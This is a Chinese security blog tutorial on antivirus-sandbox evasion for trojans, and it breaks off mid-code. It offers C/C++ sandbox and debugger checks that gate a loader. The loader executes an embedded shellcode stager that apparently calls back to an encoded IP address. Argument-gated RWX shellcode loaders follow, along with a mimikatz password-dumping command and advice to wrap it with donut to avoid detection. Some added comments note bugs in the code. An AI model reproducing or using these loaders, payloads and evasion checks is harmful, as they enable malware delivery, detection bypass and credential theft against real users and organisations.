如何反沙箱?

个人博客 wutongsec.cn

1.什么是沙箱

随着互联网的发展,网络安全问题也日益严峻。恶意软件、网络攻击等威胁不断涌现,给个人用户和企业带来了巨大的损失。为了解决这一问题,云沙箱技术应运而生。云沙箱是一种基于虚拟化技术的安全防护机制,主要用于对可疑文件、恶意代码进行分析和检测。其原理是通过在云端建立隔离的虚拟环境,将待分析的文件或代码运行在这个环境中,以模拟真实的操作系统和网络环境。通过监控和分析其行为,发现并识别其中的恶意行为。

1.2云沙箱的工作流程

1. 提交样本:用户将怀疑存在恶意的文件或代码提交给云沙箱系统。这些样本可能是通过电子邮件、下载或其他途径获得的。

2. 环境隔离:云沙箱系统将待分析的样本运行在隔离的虚拟环境中。这个虚拟环境与真实的操作系统和网络环境相似,但是与真实系统完全隔离,以防止样本对真实系统造成伤害。

3. 动态行为分析:在虚拟环境中,云沙箱系统监控样本的行为和操作。它记录样本的文件操作、注册表修改、网络连接等行为,并生成行为日志。

4. 恶意行为检测:云沙箱系统使用各种检测技术来分析样本的行为日志,以确定其中是否存在恶意行为。这些技术包括基于特征的检测、行为模式分析、机器学习等。

5. 报告生成:云沙箱系统根据分析结果生成报告。报告中包含样本的基本信息、行为日志、恶意行为检测结果等。这些报告可以帮助用户了解样本的威胁程度和行为特征。

2.为什么要反沙箱

反沙箱是木马免杀中极为重要的一个步骤, 大部分杀软本地都会有一个内置的沙箱/或者云上沙箱,当我们想要运行一个exe时,都会在沙箱中模拟运行, 进行检测

那么如何进行反沙箱呢?

思考云沙箱和真实环境的差异, 或者是云沙箱针对你当前的环境的差异, 针对性的反沙箱

3.反沙箱的基本方法

核心就是 检测当前是否在沙箱环境内

我们可以通过 语言检测 , 开机时间、延迟执行、物理内存、CPU核心数,文件名、磁盘大小、用户名、进程名去判断是否是在沙箱的环境中, 如果是在沙箱的环境, 那就退出

// Language gate: calls RunCode() only when the user's default UI language is
// Chinese; any other language prints "Error" and terminates the process.
// RunCode() is not defined anywhere on this page.
// Returns 0 on the Chinese path; the else path never returns (exit(1)).
int check() {
LANGID langId = GetUserDefaultUILanguage();
if (PRIMARYLANGID(langId) == LANG_CHINESE)
 {
printf("Chinese");
RunCode(); // run the author's code (defined elsewhere, not on this page)
 }
else
 {
printf("Error");
exit(1);
 }
return 0;
}

一般沙箱都是重新起一个机器

// Uptime gate: GetTickCount() returns milliseconds since boot; RunCode() is
// called only when that is at least 10 minutes, otherwise the process exits.
// Declared int but neither path executes a return statement: the RunCode()
// path falls off the end, so a caller that reads the result gets an
// indeterminate value.
int checkStartTime(){
ULONG uptime = GetTickCount();
if (uptime >= 10 * 60 * 1000) { // uptime of at least 10 minutes
RunCode(); // run the author's code (not defined on this page)
 }
else {
exit(1);
 }
}
// Compares a process image name against four VMware Tools process names.
// Returns -1 on an exact (case-sensitive) match, 0 otherwise.
// name must be a NUL-terminated string; strcmp on NULL is undefined behavior.
int checkVm(char* name) {
const char* list[4] = { "vmtoolsd.exe","vmwaretrat.exe","vmwareuser.exe","vmacthlp.exe" };
for (int i = 0; i < 4; i++) {
if (strcmp(name, list[i]) == 0)
return -1;
 }
return 0;
}
// Walks the process list via a Toolhelp snapshot, converts each image name to
// the ANSI code page and passes it to check(); returns false on the first
// name for which check() yields -1, true otherwise.
// NOTE(review): check() above is declared with no parameters, so check(ss_Name)
// does not match that definition. The snapshot handle is never closed, and the
// CreateToolhelp32Snapshot result is not tested for INVALID_HANDLE_VALUE.
bool CheckProcess() {
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(pe32);
HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
BOOL bResult = Process32First(hProcessSnap, &pe32);
while (bResult) {
char ss_Name[MAX_PATH] = { 0 };
// szExeFile is a wide string here; convert it to a narrow buffer of MAX_PATH bytes
WideCharToMultiByte(CP_ACP, 0, pe32.szExeFile, -1, ss_Name, sizeof(ss_Name),
NULL, NULL);
//printf("%s\n", ss_Name);
if (check(ss_Name) == -1)
return false;
bResult = Process32Next(hProcessSnap, &pe32);
 }
return true;
}   

#include <windows.h>
#include <iostream>
#include <intrin.h>
#include <Iphlpapi.h>
#include <Psapi.h>
#include <TlHelp32.h>
#include <Pdh.h>
#include <string>
#pragma comment(lib, "IPHLPAPI.lib")
#pragma comment(lib, "Psapi.lib")
#pragma comment(lib, "Pdh.lib")
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") // 不显示黑窗口
#pragma data_seg("vdata")//创建内存
#pragma data_seg()//中间
#pragma comment(linker,"/SECTION:vdata,RWE")//权限
// 是否出于调试器中
// True if IsDebuggerPresent() reports a user-mode debugger, or if
// CheckRemoteDebuggerPresent() returns non-zero. Its second argument is the
// out-parameter that would receive the result and is passed as nullptr here,
// so only the call's own BOOL return value is tested.
bool isDebuggerPresent() {
	return IsDebuggerPresent() || CheckRemoteDebuggerPresent(GetCurrentProcess(), nullptr);
}
// 检测cpu是否支持虚拟化
// Reads CPUID leaf 1 and tests bit 31 of ECX (cpuInfo[2]). The original
// comment describes this as "CPU supports virtualization"; that bit is the
// hypervisor-present flag, i.e. it is set when running under a hypervisor
// rather than when the CPU offers VT-x/AMD-V — TODO confirm against vendor docs.
// 1 << 31 shifts into the sign bit of int (undefined in strict C; MSVC accepts it).
bool checkCpuVirtualization() {
	int cpuInfo[4];
	__cpuid(cpuInfo, 1);
	return (cpuInfo[2] & (1 << 31)) != 0;
}
// 检测语言是否是非中文
// True when the user's default UI language is anything other than Chinese
// (primary language ID compared, so all Chinese sub-languages count as Chinese).
bool checkLan() {
	LANGID langId = GetUserDefaultUILanguage();
	if (PRIMARYLANGID(langId) == LANG_CHINESE)
	{
		return false;
	}
	else
	{
		return true;
	}
}
// 检测进程数量是否小于60
// Counts running processes with a Toolhelp snapshot and returns true when
// fewer than 60 are found. Returns false if the snapshot cannot be created.
// The snapshot handle is closed on the counting path.
bool checkProcessCount() {
	HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	PROCESSENTRY32 pe32 = { sizeof(PROCESSENTRY32) }; // dwSize must be set before Process32First
	if (hSnapshot == INVALID_HANDLE_VALUE) {
		return false;
	}
	int processCount = 0;
	if (Process32First(hSnapshot, &pe32)) {
		do {
			processCount++;
		} while (Process32Next(hSnapshot, &pe32));
	}
	CloseHandle(hSnapshot);
	return processCount < 60;
}
// 检cpu数量是否小于4
// True when the system reports fewer than 4 logical processors.
bool checkCpuCount() {
	SYSTEM_INFO systemInfo;
	GetSystemInfo(&systemInfo);
	return systemInfo.dwNumberOfProcessors < 4;
}
// True when the system has been up for less than 10 minutes. GetTickCount()
// returns milliseconds since boot as a 32-bit value that wraps after ~49.7 days,
// so a long-running host can briefly read as "freshly booted".
// The ';' after the closing brace is a stray empty declaration.
bool checkStartTime() {
	ULONG uptime = GetTickCount();
	if (uptime >= 10 * 60 * 1000) { // uptime of at least 10 minutes
		return false;
	}
	else {
		return true;
	}
};
// 检测是否存在沙箱dll
// Non-zero (true) when any of the listed module names is already loaded in
// the current process. GetModuleHandle only inspects the calling process and
// does not load anything itself.
bool checkSandboxDlls() {
	// Check for known sandbox-related DLLs
	return GetModuleHandle(L"Cuckoo") || GetModuleHandle(L"vmcheck") ||
		GetModuleHandle(L"SandboxieDll") ||
		GetModuleHandle(L"snxhk.dll") || GetModuleHandle(L"vmsrvc") ||
		GetModuleHandle(L"cmdvrt32") ||
		GetModuleHandle(L"SbieDll.dll") || GetModuleHandle(L"dbghelp.dll");
}
// Reads the current user name, prints it, and returns true unless the name is
// exactly "admin"; returns false on "admin" or when GetUserName fails.
// Not referenced by checkEnvironment(). UNLEN comes from <Lmcons.h>, which the
// include list on this page does not show. GetLastError() returns a DWORD, so
// %d is not the matching conversion for it.
bool checkAdminUser() {
		wchar_t userName[UNLEN + 1];
	DWORD userNameSize = UNLEN + 1;
	// fetch the name of the user running this process
	if (GetUserName(userName, &userNameSize)) {
		wprintf(L"Current User: %s\n", userName);
		// is the user name exactly "admin"?
		if (wcscmp(userName, L"admin") == 0) {
			return false; // it is "admin"
		}
		else {
			return true; // it is not "admin"
		}
	}
	else {
		wprintf(L"Error getting user name. Error code: %d\n", GetLastError());
		return false;
	}
}
// 总的检测函数
// Aggregate probe: true when any one of the listed checks is true. Because of
// short-circuit evaluation, later checks are skipped once one fires.
// checkAdminUser() is defined above but not included here.
bool checkEnvironment() {
	return isDebuggerPresent() || checkCpuVirtualization() || checkStartTime() || checkLan() ||
		checkProcessCount() || checkSandboxDlls() || checkCpuCount();
}

unsigned char sc[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x50\x00\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x4e\x70\x4a\x55\x00\x81\x26\x65\x57\x49\x80\x31\x0f\xd3\xf9\x41\xc7\x88\x6a\xac\xac\x4f\x47\xf8\x18\x34\x62\x86\x10\x95\x8c\x87\xf8\xfc\x74\x52\xc2\xd0\xb6\x95\xd6\x77\xaa\x60\x31\xcf\x7f\xe6\x57\x5f\xd5\x6b\x50\xfe\x42\x9a\xee\x1e\x34\x4f\x03\x20\xcf\xa1\xea\x29\x7f\x03\xd6\xc7\x74\x0e\x59\x72\x29\xbb\xfe\x92\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x
28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x3b\x20\x4d\x41\x47\x57\x4a\x53\x29\x0d\x0a\x00\xd9\x0d\x64\x96\xe7\x34\xbe\xc9\xb8\x50\x4e\xdd\x6a\x01\x48\xa5\x08\x0b\xc5\x8f\x20\x9c\x9b\x4b\xb8\x3d\xa4\x35\xe7\xcb\x2a\xdb\xa6\xe1\x10\x0f\xe6\x6e\x78\x13\xc8\xc4\x76\x49\x0f\x06\xbe\xfe\xc2\xca\x7f\xe0\x01\x20\x56\xf3\xd9\x11\x0c\xd9\x78\xb0\xc8\x31\xb7\xa2\x4c\x22\xa1\x9e\x24\x95\xec\x72\x70\xf6\x1a\x38\xeb\x61\x77\x9f\xd3\x91\xa2\xfe\xa6\x50\x9b\x53\x4b\x83\x13\x08\x27\x43\xd7\xa1\x9d\x06\x2d\xa0\x4a\x35\x76\x0e\xda\xf5\x6e\x2d\xe3\xf4\x6a\x66\x72\x27\xd9\x22\x7d\xe0\x73\x89\x22\xa1\xcf\xe1\xa7\x81\xde\x2d\x58\x07\x06\xa5\xc6\x40\xca\xa7\x48\x0f\x84\x95\xcb\x09\x1b\xd7\xd5\x7f\xa3\x8f\x71\xaf\xc0\xa5\x8a\xf6\x12\x2c\x71\xe5\x51\xc6\x9c\x1f\x05\x71\xbe\xca\xe8\x4a\x82\xa8\x1e\xb3\x01\xdb\x87\x45\xb7\xdb\xa9\x90\xbf\xa3\x28\x30\x54\x2c\x74\x92\x84\x76\x10\x7f\x96\x80\x47\x79\xfe\xf7\xd2\xc7\x56\xa1\xc3\xb5\xf4\x55\xa3\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x32\x2e\x31\x33\x31\x00\x00\x01\x86\xa0";

// Entry point: returns 1 without running anything when checkEnvironment()
// reports one of its conditions; otherwise casts the address of the sc byte
// array to a function pointer and calls it, i.e. executes the array contents
// as code. If control ever comes back, main falls off the end (C++ main
// implicitly returns 0).
int main() {
	if (checkEnvironment()) {
		// environment looks like a sandbox: exit
		//std::cout << "Detected sandbox environment. Exiting..." << std::endl;
		return 1;
	}
	// call the sc array as a function
	((void(*)()) & sc)();
}

分离免杀 本地/网络

参数启动

指的是在启动exe的时候, 通过命令行的参数启动, 参数一定要是强参数

#include <windows.h>
#include <stdio.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") // 不显示黑窗
口
unsigned char sc[] = "\xfc\x48\x83\xe4\xf0\xe8";
// Entry point of the argument-gated loader. Requires argv[1] to equal
// "dabaige"; argv[1] is dereferenced without checking argc, so launching with
// no arguments passes NULL to strcmp, which is undefined behavior.
// On a match: allocates a read/write/execute region of sizeof(sc) bytes
// (sc is a string literal here, so that count includes its terminating NUL),
// copies sc into it, starts a thread at that address, waits for the thread,
// and closes the handle. The CreateThread result is not checked for NULL.
int main(int argc, char* argv[]) {
 if (strcmp(argv[1], "dabaige") != 0) {
 return 1;
 }
 // VirtualAlloc a sizeof(sc)-byte region with execute permission
 LPVOID addr = VirtualAlloc(NULL, sizeof(sc), MEM_COMMIT | MEM_RESERVE, 
PAGE_EXECUTE_READWRITE);
 // allocation failed: exit
 if (addr == NULL) {
 return 1;
 }
 // copy the shellcode into that region
 memcpy(addr, sc, sizeof(sc));
 // create a thread that starts at the copied bytes
 HANDLE hThread = CreateThread(NULL,
 NULL,
 (LPTHREAD_START_ROUTINE)addr,
 NULL,
 NULL,
 0);
 // wait for the thread; -1 converts to DWORD 0xFFFFFFFF, i.e. INFINITE
 WaitForSingleObject(hThread, -1);
 // close the thread handle
 CloseHandle(hThread);
}

有的参数被360拉黑, 比如mimikatz抓密码

比如这个抓密码的命令

output.exe "privilege::debug" "log" "sekurlsa::logonpassWords"

你mimikatz免杀没做好, 可能是参数被拦截了

解决办法, 使用甜甜圈(donut_v1.0)把mimikatz以及需要运行的参数转成shellcode, 然后使用加载器 运行即可

加载器免杀就行

#include <windows.h>
#include <stdio.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") // 不显示黑窗口
/* length: 893 bytes */
unsigned char sc[] = { 0xe8,0xf3,0x04,0x00,0x00,0x14,0x52,0x6b,0x86,0x1c,0x8c,0x4d,0x70,0xff,0xff,0xb3,0x72,0x54,0x24,0x00,0x00,0x00,0x41,0x30,0x34,0x0a,0x41,0x02,0x34,0x0a,0xe2,0xf6,0x72,0x50,0xf5,0xf1,0xf1,0xed,0x06,0xe6,0xb4,0x5a,0x67,0x61,0xb9,0xff,0x61,0x19,0x0a,0xc3,0x60,0x0b,0xa8,0xc9,0xa4,0xd0,0xce,0x6b,0x13,0x27,0xaf,0xea,0xe0,0xb4,0x38,0x12,0xd4,0xcc,0xe4,0x70,0xc0,0x8c,0xd8,0xb5,0xea,0x8b,0x29,0xb0,0x9f,0x4c,0xa8,0x73,0x35,0xef,0x9f,0x96,0x40,0x17,0x72,0x65,0x33,0xcd,0xb5,0x26,0x68,0xa0,0xbc,0xed,0x50,0x01,0xa8,0x06,0xc8,0x2d,0x4d,0x23,0x17,0x3a,0x6f,0xb9,0xe9,0x03,0xac,0xf6,0x8b,0xe3,0xab,0x68,0x31,0xf5,0x23,0x54,0x0e,0xa1,0x18,0x99,0xcd,0x82,0x9c,0xb9,0x6f,0x54,0x78,0xad,0xee,0x7d,0x0a,0x61,0xb4,0x5b,0x2a,0xd9,0xf4,0xa9,0x68,0x8b,0x5a,0x3b,0x00,0xc9,0xab,0x42,0x29,0x74,0x8f,0xdf,0x8e,0x33,0xf7,0xfd,0x89,0xb7,0x61,0x5c,0x4c,0x62,0x92,0x07,0x5a,0x7a,0x5a,0x15,0x6c,0x21,0xbb,0xc6,0xf2,0x94,0x2b,0xaf,0xfb,0xeb,0x3b,0xdf,0x69,0xad,0x1f,0xad,0x63,0x45,0x31,0xd4,0x3f,0x63,0x90,0x32,0xb7,0x5d,0xf1,0xf7,0x10,0x53,0x41,0x79,0x50,0x9d,0x61,0xff,0x64,0x6c,0xd1,0x34,0x45,0x57,0x3d,0x50,0x2f,0x2e,0xec,0x32,0xcd,0x9d,0xc5,0x27,0x72,0x23,0xa3,0x1b,0xf8,0x40,0xaa,0xb6,0x25,0x6c,0x46,0x54,0x97,0x3b,0x72,0x96,0x33,0xa0,0x04,0xb9,0x06,0x6a,0x20,0xc7,0xb0,0x4f,0x23,0xaa,0x37,0xa0,0xc7,0xcb,0x7f,0xdf,0x75,0x6e,0x0d,0xe5,0xfa,0x9b,0x97,0x06,0x41,0xd5,0xe5,0xd6,0x90,0xca,0x96,0x45,0xbc,0x6c,0xe8,0x86,0x37,0xdd,0x26,0x8e,0x72,0x2e,0x16,0xe6,0xea,0xee,0x56,0x6e,0xa4,0x29,0x7b,0x3b,0x88,0xd7,0x0a,0x48,0xe9,0xbd,0xc8,0x36,0x63,0x36,0xad,0xa3,0xd3,0x67,0x8a,0xd5,0x89,0x2d,0x91,0x8b,0x9c,0xc1,0xb3,0x83,0xb2,0x5c,0xb2,0xe3,0xf1,0xfe,0xe8,0x04,0x92,0x4d,0xe6,0x81,0xee,0x46,0xc6,0x2c,0xd6,0x5e,0x38,0xab,0x16,0x06,0x57,0xea,0xed,0x01,0x3d,0x9b,0xcd,0x2c,0xba,0x3c,0x82,0x48,0xf2,0x2e,0x49,0x44,0x74,0xe8,0xb6,0x9c,0x04,0x90,0xe8,0x6d,0xb3,0x93,0x94,0xc2,0x72,0x6b,0xc1,0x43,0x3f,0x3c,0x55,0x15,0xe0,0xd3,0xf9,0xc3,0x02,0x16,0x9c,0x81,0x18,0x13,0x04,0x8a,0x65,0xf0,0x0a,0x86,0xfd,0x63,0xb3,0x
e2,0x17,0xeb,0xae,0x7e,0x9d,0x8f,0x21,0xfd,0x47,0x58,0x3b,0x38,0xbf,0x67,0x9a,0x19,0x6d,0xb7,0xc3,0x49,0x8f,0xec,0xf6,0x15,0x7b,0x0e,0x83,0x4a,0xfb,0x5d,0xbe,0x13,0xb5,0x66,0x60,0x7b,0xd7,0x8b,0xc5,0x4d,0x34,0xe7,0xe7,0x52,0x12,0x2d,0xaa,0x2b,0x6a,0x7e,0xeb,0xa1,0x19,0xca,0xb4,0x7c,0x7f,0xc4,0xad,0x89,0xd4,0x55,0xd3,0x44,0x8a,0x40,0x61,0xdf,0xc3,0xa7,0x1f,0x16,0x11,0x83,0x01,0xe6,0x53,0xcf,0xa0,0x02,0x1c,0x55,0x75,0x70,0x85,0x4e,0x43,0x8f,0x37,0xa1,0xe8,0x55,0x20,0x8d,0x9e,0x8e,0xbc,0x6e,0x5e,0x65,0x4d,0x84,0xa3,0x94,0xa1,0xf6,0x46,0x7a,0xbb,0x07,0x54,0x5f,0x9a,0x04,0x5b,0x10,0x7f,0xf7,0x9e,0x1b,0x77,0x01,0x91,0x59,0x63,0x44,0x89,0xf6,0x72,0xe2,0x3f,0x4c,0x05,0x9e,0x03,0xb6,0x23,0x81,0x94,0xbc,0x18,0x1a,0xd2,0x06,0x73,0x28,0x78,0x7d,0x35,0x99,0xb4,0xc4,0xa5,0x22,0xdb,0x89,0x77,0x50,0xe2,0xf6,0xac,0x86,0x8b,0x42,0x1b,0x31,0xeb,0x71,0x45,0x1e,0x8a,0x58,0xfc,0x26,0xc5,0x2e,0xe8,0xcc,0x9a,0x49,0x21,0x5c,0x95,0xf9,0x21,0x2d,0xd0,0xae,0x9e,0x10,0xb8,0x21,0x7e,0xb9,0x3f,0x53,0x53,0xa9,0x43,0x59,0x40,0x52,0xf7,0x2c,0xbd,0x0d,0x9b,0xec,0x7b,0x56,0xd9,0x3e,0xc6,0x7d,0xeb,0x8e,0x43,0x3c,0x1d,0xd3,0x22,0x36,0x3b,0x13,0x01,0x94,0x88,0x8e,0x7b,0x29,0xa3,0x42,0xa5,0xb7,0xc5,0x4d,0xd6,0x21,0xee,0x3d,0x28,0x4c,0x4e,0x16,0x30,0xbe,0x34,0x79,0x10,0x91,0xf4,0x8e,0x80,0x8e,0x88,0xf2,0x66,0x5f,0x15,0x3e,0xa2,0xab,0x95,0x27,0x1b,0x5b,0x41,0x9a,0x5f,0x42,0x25,0x69,0x90,0x30,0x96,0xa1,0x56,0x31,0x56,0x14,0x3c,0xa3,0x42,0xa4,0xb2,0x98,0x1e,0xbc,0x87,0x6f,0x05,0xd0,0x8c,0x49,0x2d,0xe4,0xec,0x1d,0xd8,0x2e,0x3b,0x68,0xfa,0x4e,0x12,0x5b,0xa3,0x68,0x61,0xd4,0xe7,0xcf,0xdb,0x43,0x06,0xcd,0xcd,0x4d,0xa7,0x96,0xf3,0x58,0x72,0xb9,0x85,0xd9,0x0a,0x5f,0x0b,0x0d,0x60,0x31,0x09,0x0e,0x5c,0xd5,0x0c,0x14,0x15,0xf0,0x2b,0x64,0xf9,0xf8,0x53,0x9b,0x6e,0x9a,0x33,0x35,0x13,0xec,0x2d,0x85,0xc0,0x97,0x41,0x77,0x5f,0x1a,0xe6,0xc0,0x86,0xbd,0xc2,0x5d,0xe4,0x34,0x03,0xd7,0x33,0xc9,0x12,0x00,0x95,0x9d,0xd0,0xed,0x90,0xf3,0x13,0xa3,0x26,0x17,0x09,0x1e,0x65,0x27,0x5b,0x51,0x63,0x09,0x70,0x09,0x59,0xfb,0xde,0xea,0x76,0x
b7,0x7d,0xa5,0xb1,0x1c,0x58,0x7b,0xac,0xcc,0x0a,0x87,0xe0,0xf5,0x4c,0x79,0x60,0xbb,0x97,0xf4,0x65,0xf3,0x0b,0xd1,0x08,0xb2,0xd8,0xd4,0xc0,0x6b,0x25,0x4b,0x6a,0x11,0x1f,0xe6,0x23,0xf6,0xe7,0xf3,0xf1,0x79,0x32,0xb2,0x56,0x83,0x4b,0x93,0xb1,0xfb,0xaa,0x02,0x7f,0x2d,0x68,0x04,0xb3,0xc2,0x74,0xa9,0x91,0x84,0x95,0x5c,0x67,0xba,0xd6,0x4b,0x8f,0x6b,0x70,0x7d,0x45,0x40,0x63,0x20,0x7e,0x68,0xc4,0xdd,0x4c,0xbf,0x78,0x96,0x2d,0x3a,0xc2,0x6a,0x88,0x96,0x0b,0xd9,0x21,0x20,0xe1,0x65,0xe3,0x8d,0x62,0x12,0x93,0x37,0x56,0x6c,0xac,0x9d,0xc6,0x8d,0x47,0xaf,0x6b,0xeb,0x31,0x42,0xd5,0xec,0x06,0x7b,0x58,0xdb,0xa7,0x06,0x6e,0x8c,0xb1,0x03,0x13,0x2d,0x32,0x02,0x91,0x39,0x55,0xf6,0x12,0xfe,0x68,0xdd,0xcd,0x4c,0xfe,0x89,0x1b,0x3f,0x69,0x66,0x33,0x25,0x72,0x0d,0xb0,0xf6,0x36,0x32,0x92,0x89,0x2b,0xfe,0xc0,0x2a,0x48,0xe0,0x49,0x2a,0xc9,0x7e,0x72,0x46,0x85,0xa6,0xa5,0xe6,0x14,0xf7,0x4a,0x4c,0x1a,0x19,0x34,0x5d,0x1b,0xb0,0x48,0x3f,0xd5,0xad,0xa6,0x03,0xa8,0x15,0x18,0x51,0x6e,0x83,0x52,0xdc,0x43,0x44,0x7f,0xa7,0x38,0xaa,0x98,0x2c,0xf3,0x7f,0xd9,0xda,0x01,0xaf,0x1d,0x9f,0xdd,0xa6,0x9b,0xe3,0x96,0x8e,0xd0,0x94,0x66,0xa1,0x6d,0xd2,0xb7,0xd0,0x0d,0x40,0xd2,0x01,0x36,0xb1,0xa1,0x06,0xe8,0xcc,0x05,0x41,0x01,0x73,0x8e,0x91,0x99,0x68,0x10,0x03,0x7e,0x09,0x09,0xe1,0x7e,0xdb,0xb7,0xe9,0x1f,0xfd,0x59,0xdc,0x9b,0x32,0x04,0x3a,0x72,0x77,0x13,0x65,0x0f,0xc3,0xd3,0x19,0xc7,0xbb,0xe7,0x92,0xcc,0xbb,0x2c,0x36,0x89,0x6d,0x73,0x97,0x20,0xab,0xb5,0x77,0x48,0x0c,0x0c,0x68,0x44,0x5f,0x80,0x52,0x4c,0x0a,0xf7,0x38,0x6b,0x36,0x67,0xca,0xf4,0x6c,0xbf,0x38,0x21,0xd5,0x3e,0x2b,0xe1,0x06,0x23,0xec,0x06,0xb4,0x17,0x35,0x52,0x96,0x88,0x8c,0xca,0x53,0xbd,0x37,0xdd,0xdd,0xd4,0x58,0xdb,0xdc,0xbd,0x49,0xf0,0x45,0xea,0x12,0x0b,0x8a,0xa3,0xc6,0x00,0xc7,0x02,0xb7,0xf5,0x00,0x71,0x34,0x78,0x73,0x50,0x9b,0x60,0xd9,0x45,0x16,0x9a,0x58,0x63,0x35,0x8b,0xcb,0x0a,0x4b,0xc7,0xb8,0xaf,0x09,0x1f,0x44,0xe1,0x44,0x5e,0xba,0x50,0xf9,0xb9,0xb9,0x14,0xfa,0xde,0x5f,0x51,0x54,0x42,0x87,0x37,0xd4,0xe1,0x2c,0x36,0x7c,0x8e,0x7b,0xbf,0x01,0x8a,0x56,0x45,0x
65,0x0c,0x4e,0xd0,0x03,0xb0,0x3e,0x8f,0x87,0xc7,0x61,0x15,0xae,0x73,0xc5,0xee,0x74,0xd6,0xb5,0xc7,0x4c,0xb9,0xff,0xd4,0x02,0x34,0xee,0x22,0x3f,0x66,0x7e,0x17,0x5b,0xa8,0xb4,0x00,0x46,0x35,0xd9,0x0d,0xe6,0xe4,0x25,0xd2,0x95,0x57,0xed,0x06,0x84,0xc5,0xa2,0xcd,0x0b,0xe6,0x5d,0x43,0x77,0x9c,0x1a,0x5b,0xd4,0x87,0x49,0xda,0xf8,0x6c,0xcd,0x8a,0x8b,0xb4,0x32,0xe8,0x87,0xe1,0x68,0xd5,0xa4,0x4c,0x8b,0x14,0x24,0x48,0x83,0xec,0x08,0x41,0x81,0x2a,0xd4,0x9b,0x23,0x3e,0x4d,0x0f,0x4f,0xd2,0x41,0xc1,0x42,0x04,0x84,0x4d,0x39,0xe4,0x41,0xf7,0x52,0x08,0x48,0x87,0xd2,0xeb,0x00,0x41,0xc1,0x42,0x0c,0x3e,0x41,0xff,0xe2 };
// Entry point of the argument-gated loader. Requires argv[1] to equal
// "123456"; argv[1] is dereferenced without checking argc, so launching with
// no arguments passes NULL to strcmp, which is undefined behavior.
// On a match: allocates a read/write/execute region of sizeof(sc) bytes
// (sc is a brace-initialized array here, so no terminating NUL is counted),
// copies sc into it, starts a thread at that address, waits for the thread,
// and closes the handle. The CreateThread result is not checked for NULL.
int main(int argc, char* argv[]) {
	if (strcmp(argv[1], "123456") != 0) {
		return 1;
	}
	// VirtualAlloc a sizeof(sc)-byte region with execute permission
	LPVOID addr = VirtualAlloc(NULL, sizeof(sc), MEM_COMMIT | MEM_RESERVE,
		PAGE_EXECUTE_READWRITE);
	// allocation failed: exit
	if (addr == NULL) {
		return 1;
	}
	// copy the shellcode into that region
	memcpy(addr, sc, sizeof(sc));
	// create a thread that starts at the copied bytes
	HANDLE hThread = CreateThread(NULL,
		NULL,
